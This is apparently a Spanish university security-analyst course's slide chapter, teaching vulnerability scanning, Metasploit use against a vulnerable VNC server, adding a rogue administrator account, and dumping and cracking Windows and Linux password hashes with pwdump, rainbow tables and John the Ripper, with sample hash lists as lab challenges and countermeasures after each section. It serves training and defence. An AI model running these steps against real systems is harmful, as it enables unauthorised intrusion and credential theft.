Capitulo 3. Analista de Sistemas

Descargar como pdf o txt
Descargar como pdf o txt
Está en la página 1de 37

Analista de Seguridad Informática

Capítulo 3. Analista de sistemas

Analista de Seguridad Informática

Organiza

Enseñanzas Propias Dpto. Lenguajes y Computación

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 1
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Fallos de
seguridad

Información de los
equipos

Estructura empresa
Equipos activos

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 2
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

•Buscar información a través de Webs

•Windows
•MBSA (Microsoft Baseline Security Analizer)
•GFILanguard

•Windows / Linux
•Retina Network Security Scanner
•Shadow Security Scanner
•Nessus

Webs

www.webzscan.com

www.cert.org

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 3
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Webs

www.packetstormsecurity.org

www.milw0rm.com

Webs

secunia.com

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 4
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Microsoft Baseline Security Analizer (MBSA)

Ventaja: Una guía muy util si tenemos accedo directo al equipo

GFI LANGuard

Ventaja: Muy útil cuando está habilitado Compartir Archivos..

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 5
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

GFI LANGuard
/Backtrack/Vulnerability Identification/Security Scanner
/GFI LanGuard

Retina Network Security Scanner

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 6
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Shadow Security Scanner

Ventaja: permite definir perfiles de scaneo (p.e. servidor web)

Nessus

Ventaja: El mejor

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 7
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Nessus - instalació
instalación
Nessus
sh nessus-installer-2[1].2.4.sh
Aceptar todas las confirmaciones
Código de activación para las plugins (www.nessus.org/plugins)
0FC2-7D96-A960-C9A5-8237

Nessus - instalació
instalación
Crear un certificado nessus-mkcert

Aceptar todos los cambios

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 8
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Nessus - instalació
instalación
Crear un usuario nessus-adduser
pepe // nombre del usuario
pass // tipo de autentificación
hola00 // contraseña
Ctrl+D
yes

Nessus - instalació
instalación
Ejecutar daemon nessusd

nmap localhost

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 9
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Nessus - instalació
instalación
Ejecutar cliente en windows nessuswx

Comunications,
Connect

Nessus - instalació
instalación

Activo los
plugins

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 10
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Nessus - instalació
instalación

Nessus - instalació
instalación

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 11
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

RETO

Escanea los fallos de seguridad de las máquinas virtuales suministradas y


de una máquina externa (siempre que tengas permiso para hacerlo).

CONTRAMEDIDAS

Para evitar el ataque debemos realizar las siguientes medidas:


•Actualizar de forma periódica el software
•Utilizar herramientas para escanear las vulnerabilidades de nuestro
equipo.

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 12
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Metasploit Framework es una herramienta diseñada por la


comunidad underground para testeo y penetración de
máquinas remotas o locales a través de uso de exploits.
Los exploits que se manejan en esta herramienta se clasifican
siguiendo una jerarquía de módulos y se diferencian según el
error que se ha vulnerado, el sistema operativo y el tipo de
programa al que pertence el software vulnerable. Cada exploit
se genera de forma distinta según los parámetros que se
necesiten. La base de datos de exploits puede actualizarse
desde Internet o a través de la página web principal del
programa www.metasploit.com.

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 13
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Utilización mediante consola (msf)

Utilización mediante web (localhost:5555)

Buscar un equipo vulnerable

A continuación vamos a buscar los equipos que utilizan el


servidor VNC.
Hay dos formas:
•Escaneo de puertos normal (p.e. nmap -A)
•Con un exploit dedicado

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 14
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Buscar un equipo vulnerable – escaneo de puertos

nmap 80.32.2.0/24 –p 5900

Buscar un equipo vulnerable – con exploit

Iniciar backtrack
Crear una consola
cd /pentest/scanners

cd vnc

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 15
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Buscar un equipo vulnerable – con exploit

VNC_bypauth -p 5900 -i 192.168.0.0-192.168.0.255 -vnc -vv

80.58.32.0/24

Por lílínea de comandos


cd /pentest/exploits/framework2
msfconsole

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 16
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Por lílínea de comandos


show exploits

use realvnc_41_bypass

Por lílínea de comandos

show options

set RHOST 80.40.5.12


set LHOST 127.0.0.1

exploit

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 17
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Utilizando una interfaz grá


gráfica
msfweb

http://localhost:55555

Utilizando una interfaz grá


gráfica

net user maria pass /add


net localgroup Administradores maria /add

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 18
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Buscar vulnerabilidades
/Backtrack/Vulnerability Identification/Security Scanner/MS03-026

Lanzador automá
automático - ninja
/Backtrack/Penetration/Metasploit/Ninja

Realiza un ataque de fuerza bruta a todos los equipos de la red

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 19
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

RETO

Para superar el reto tienes que realizar las siguientes tareas:


•Accede a través de la distribución backtrack al servidor de windows 2k3
•Busca un servidor VNC vulnerable

CONTRAMEDIDAS

Para evitar el ataque debemos realizar las siguientes medidas:


•Actualizar de forma periódica el software
•Utilizar herramientas para escanear las vulnerabilidades de nuestro
equipo.
•Utilizar una correcta arquitectura de cortafuegos y limitar los
servicios externos

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 20
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Ataques contra contraseñ


contraseñas

En los sistemas operativos Windows, las


contraseñas no se almacenan en texto plano,
sino que se almacenan cifradas con una función
hash en una zona llamada Administración de las
Cuentas de Seguridad (en ingles SAM).
Las contraseñas no sólo se cifran, sino que
además se cifran de una forma aleatoria
conocida como “hash unidireccional”, que
significa que el algoritmo de cifrado convertirá la
contraseña de texto plano a su forma cifrada pero
que a partir del hash no se puede obtener la
contraseña.

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 21
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Ataques contra contraseñ


contraseñas
Windows almacena dos versiones del hash en el SAM. Una, el
“hash del administrador de la LAN”, o LANMAN, es una versión
heredada de Windows NT. El hash LANMAN se calcula
partiendo de la versión en letras mayúsculas de la contraseña
del usuario y se divide en dos mitades de siete caracteres
A causa de sus propiedades, este tipo de contraseña resulta
mucho más sencilla de craquear que su sucesor, el
Administrador de la LAN en NT (NTLM), que entre otras
características, no convierte la contraseña a caracteres en
mayúscula.

Ataques contra contraseñ


contraseñas

A modo de ejemplo, a continuación puede ver el hash de la


cuenta de administrador de un equipo:

Administrador:500:BCE739534EA4E445AAD3B435B51404EE:
616820449E071DF5D1C893BA19CA6772:::

Usuario
LANMAN
NTLM

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 22
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Ataques contra contraseñ


contraseñas
Para obtener la contraseña de un sistema, primero tenemos
que obtener los valores hash del sistema.
Después utilizaremos las Rainbow Tables para obtener las
contraseñas que representan dichos valores. Las tablas
Rainbow son tablas que se generan previamente para obtener
una contraseña con una longitud y un determinado conjunto de
caracteres.

Ataques contra contraseñ


contraseñas
Además de poder generar nuestras propias tablas, podemos
utilizar los servicios proporcionados por diferentes portales:
para descargarnos las tablas www.freerainbowtables.com;
para utilizar las tablas de otros sistemas previo pago
www.plain-tech.info; ó si lo deseamos podemos ayudar a la
comunidad a generar de forma distribuida las tablas (p.e.
DistrRTgen).

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 23
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Ataques contra contraseñ


contraseñas

Los pasos que debemos realizar son los siguientes:


•Obtener el fichero de contraseñas SAM
•Generar las tablas Rainbow y ordenarlas
•Obtener la contraseña

Ataques contra contraseñ


contraseñas
Obtener el fichero de contraseñ
contraseñas
El fichero SAM se encuentra alojado en el directorio
%windir%\system32\config donde podemos encontrar un
fichero llamado “SAM”, que está formado por la representación
de los bytes pertenecientes a la clave del registro
HKEYL_LOCAL_MACHINE\SAM. Si intentamos acceder desde
el sistema de ficheros o desde el registro de Windows cuando
el sistema está en funcionamiento, se nos negará el acceso
tanto a la lectura como a la escritura o copia de datos.

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 24
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Ataques contra contraseñ


contraseñas
Obtener el fichero de contraseñ
contraseñas
Formas de obtener el fichero:
•Extraer el SAM con disco de arranque
•Extraer el SAM con el disco de reparación (Copia inicial)
•CIA Commander

Ataques contra contraseñ


contraseñas
Obtener el fichero de contraseñ
contraseñas
Formas de obtener el fichero:
•pwdump3 <nombre maquina> <fichero salida>

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 25
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Ataques contra contraseñ


contraseñas
Obtener el fichero de contraseñ
contraseñas
Administrador:500:E1EC19D97C21BE9D7584248B8D2C9F9E:9354D9D68325314C5DBB08F315B35ABB:::
ana:1005:CCF9155E3E7DB453AAD3B435B51404EE:3DBDE697D71690A769204BEB12283678:::
felipe:1008:AEBD4DE384C7EC43AAD3B435B51404EE:7A21990FCD3D759941E45C490F143D5F:::
Invitado:501:NO PASSWORD*********************:NO PASSWORD*********************:::
javier:1006:0B1D44C6C4139530AAD3B435B51404EE:483D9BAAAF3104161C3AD1B34553D374:::
maria:1004:D7FD67A694E3B797AAD3B435B51404EE:DB4C43150BA0D803B6FF1A7F22F79FBD:::
pepe:1003:D931A4EE9642F3DA8928BD2185125EFC:16B3581069729126E06E4BD48315FBFE:::
SUPPORT_388945a0:1001:NO PASSWORD*********************:897B1090812C554E98AA55E511BE4B8E:::
tomas:1007:0B1D44C6C4139530AAD3B435B51404EE:3495BE77996191A8136951F93FA67A76:::

Ataques contra contraseñ


contraseñas
Obtener el fichero de contraseñ
contraseñas
Formas de obtener el fichero:
•Utilizando el programa Cain & Abel
Instalamos el servicio Abel, nos vamos al equipo y obtenemos los
hashes

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 26
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Ataques contra contraseñ


contraseñas
Obtener el fichero de contraseñ
contraseñas
Formas de obtener el fichero:
•Utilizando el programa Cain & Abel
Si queremos obtener una contraseña, seleccionamos el hash,
pulsamos el botón derecho y seleccionamos “Sento to crack”. Nos
vamos a la pestaña “Cracker” e iniciamos el ataque

Ataques contra contraseñ


contraseñas
Generar las tablas Rainbow y ordenarlas

Para generar nuestra tabla debemos indicar la longitud máxima


de la contraseña y el conjunto de caracteres que puede tener la
contraseña que deseamos romper. Los conjuntos de caracteres
se encuentran definidos en el fichero charset.txt y son los
siguientes:

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 27
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Ataques contra contraseñ


contraseñas
Generar las tablas Rainbow y ordenarlas
Por ejemplo, si deseamos generar una tabla con el conjunto de
caracteres numéricos debemos ejecutar el siguiente comando:
rtgen lm numeric 1 7 0 2100 8000000 all
Los valores más importantes son:
•lm es el tipo de firma digital. Los tipos de firma digital son
lm, ntlm, md5 y sha1.
•numeric es el conjunto de caracteres definido en el
fichero charset.txt. Los conjuntos de caracteres definidos
son: numeric, alpha, alpha-numeric, alpha-numeric-
symbol14, all
•1 es la longitud mínima de la contraseña, y 7 es la
longitud máxima.
•0 es el índice de la tabla rainbow.
•all es el sufijo que tendrá el fichero.

Ataques contra contraseñ


contraseñas
Generar las tablas Rainbow y ordenarlas
Charset.txt

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 28
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Ataques contra contraseñ


contraseñas
Generar las tablas Rainbow y ordenarlas
Por ejemplo, si deseamos generar una tabla con el conjunto de
caracteres numéricos debemos ejecutar el siguiente comando:
rtgen lm numeric 1 7 0 2100 8000000 all

Ataques contra contraseñ


contraseñas
Generar las tablas Rainbow y ordenarlas
La probabilidad de obtener la contraseña teniendo una tabla es
del 0,6055 (60,05%).
Si queremos aumentar la probabilidad de acierto podemos
añadir más tablas rainbow. Para calcular la probabilidad de
acierto teniendo varias tablas tenemos que seguir la siguiente
formula: p(n)= 1 - (1 - 0.6055) ^ n
1,0000
0,9000
0,8000
0,7000
0,6000
0,5000
0,4000
0,3000
0,2000
0,1000
0,0000
1 2 3 4 5 6 7 8 9 10 11

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 29
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Ataques contra contraseñ


contraseñas
Generar las tablas Rainbow y ordenarlas

Como hemos visto antes, el quinto parámetro nos indica el


número de tabla que queremos generar. A continuación
podemos ver el código necesario para generar 5 tablas
numéricas.
rtgen lm numeric 1 7 0 2100 800000 all
rtgen lm numeric 1 7 1 2100 800000 all
rtgen lm numeric 1 7 2 2100 800000 all
rtgen lm numeric 1 7 3 2100 800000 all
rtgen lm numeric 1 7 4 2100 800000 all

Ataques contra contraseñ


contraseñas
Generar las tablas Rainbow y ordenarlas

Una vez generadas las tablas, el siguiente paso que demos


realizar es ordenarlas. Para ello debemos ejecutar el
comando rsort <nombre de la tabla>.
rtsort lm_numeric#1-7_0_2100x8000000_all.rt

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 30
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Ataques contra contraseñ


contraseñas
Obtener las contraseñ
contraseñas
Una vez que te tenemos los valores hash en el fichero
datos.txt, para obtener las contraseñas debemos ejecutar el
comando
rcrack *.rt –f datos.txt

Ataques contra contraseñ


contraseñas
Obtener las contraseñ
contraseñas - Ejemplo
rtgen lm numeric 1 7 0 2100 400000 all

rtsort lm_numeric#.....rt

rcrack *.rt –f datos.txt

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 31
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Ataques contra contraseñ


contraseñas

ophcrack

Ataques contra contraseñ


contraseñas

ophcrack
Si desea pasar la imagen ISO a
una unidad USB debe realizar
los siguientes pasos:
• Descarga la última imagen ISO
• Descarga e instala MySlax Creator
• Ejecuta MySlax Creator
• En la pantalla de selección de origen
(Select Source): selecciona iso-
default, luego busca la imagen ISO
en tu disco, haz click en "mount" y
luego haz click en la unidad USB.
• En la pantalla siguiente: selecciona
tu unidad USB, haz click en "create

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 32
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Ataques contra contraseñ


contraseñas

RETO

El reto consiste en obtener la contraseña del administrador de un sistema


Windows. Para ello, el alumno dispone del fichero obtenido de ejecutar el
comando pwdump localhost pass.txt en la máquina.
Administrador:500:E1EC19D97C21BE9D7584248B8D2C9F9E:9354D9D68325314C5DBB08F315B35ABB:::
ana:1005:CCF9155E3E7DB453AAD3B435B51404EE:3DBDE697D71690A769204BEB12283678:::
felipe:1008:AEBD4DE384C7EC43AAD3B435B51404EE:7A21990FCD3D759941E45C490F143D5F:::
Invitado:501:NO PASSWORD*********************:NO PASSWORD*********************:::
javier:1006:0B1D44C6C4139530AAD3B435B51404EE:483D9BAAAF3104161C3AD1B34553D374:::
maria:1004:D7FD67A694E3B797AAD3B435B51404EE:DB4C43150BA0D803B6FF1A7F22F79FBD:::
pepe:1003:D931A4EE9642F3DA8928BD2185125EFC:16B3581069729126E06E4BD48315FBFE:::
SUPPORT_388945a0:1001:NO PASSWORD*********************:897B1090812C554E98AA55E511BE4B8E:::
tomas:1007:0B1D44C6C4139530AAD3B435B51404EE:3495BE77996191A8136951F93FA67A76:::

Ataques contra contraseñ


contraseñas

CONTRAMEDIDAS

Para evitar el ataque debemos tomar las siguientes medidas:


•Fortalecer las contraseñas a través de las directivas de seguridad
local
•Utilizar medidas biométricas
•Utilizar contraseñas de más de 13 caracteres (NTLM)

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 33
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Ataques contra contraseñ


contraseñas

CONTRAMEDIDAS

Ataques contra contraseñ


contraseñas

CONTRAMEDIDAS

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 34
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Ataques contra contraseñ


contraseñas
La firma digital de las contraseñas en linux se puede
encontrar en el fichero /etc/shadow ó en el fichero
/etc/passwd
•Si la contraseña se encuentra en el fichero /etc/passwd
entonces cualquier usuario puede llevarse una copia del
fichero y hacer un ataque de fuerza bruta offline sobre las
contraseñas.
•Y si la contraseña se encuentra en el fichero
/etc/shadow, aunque es más difícil un usuario puede
utilizar un exploit y leer el contenido del fichero para
después realizar el ataque de fuerza bruta

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 35
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Ataques contra contraseñ


contraseñas
La sintaxis del fichero es:

root:$1$iUVR5Rl1$3ophMWtv4HMIxLic0ya3x.:0:0:root:/root:/
bin/bash

Contraseña cifrada

Ataques contra contraseñ


contraseñas
Es posible hacer un ataque de fuerza bruta sobre las
contraseñas utilizando:

John the
ripper

@stack LC5

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 36
Analista de Seguridad Informática
Capítulo 3. Analista de sistemas

Ataques contra contraseñ


contraseñas

RETO

El reto consiste en obtener las contraseñas de los siguientes usuarios:

root:$1$iUVR5Rl1$3ophMWtv4HMIxLic0ya3x.:0:0:root:/root:/bin/bash
usuario:$1$ZV/w3LrM$La0AN9rgtvl5H9EaYUuAd/:500:500::/home/usuario:/bin/bash
pepe:$1$M87MxBA1$Hnvd4rWXHzUpaMr.zIHHZ1:501:501::/home/pepe:/bin/bash
maria:$1$OpmRAkMW$fFOXw7XXupkyCxOK01EXC/:502:502::/home/maria:/bin/bash
ana:$1$WJTYRSbL$I5KBulpXS2jfde6FyopzJ1:504:504::/home/ana:/bin/bash

Ataques contra contraseñ


contraseñas

CONTRAMEDIDAS

Para evitar el ataque debemos realizar las siguientes medidas:


•Utilizar contraseñas seguras. Más de 13 caracteres y con
requerimientos de complejidad modificando el fichero /etc/login.defs
•Guardar las contraseñas en el fichero /etc/shadow Ejecutar el
comando pwconv

© Julio Gómez López jgomez@ual.es


www.administraciondesistemasoperativos.com
Universidad de Almería 37

También podría gustarte

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy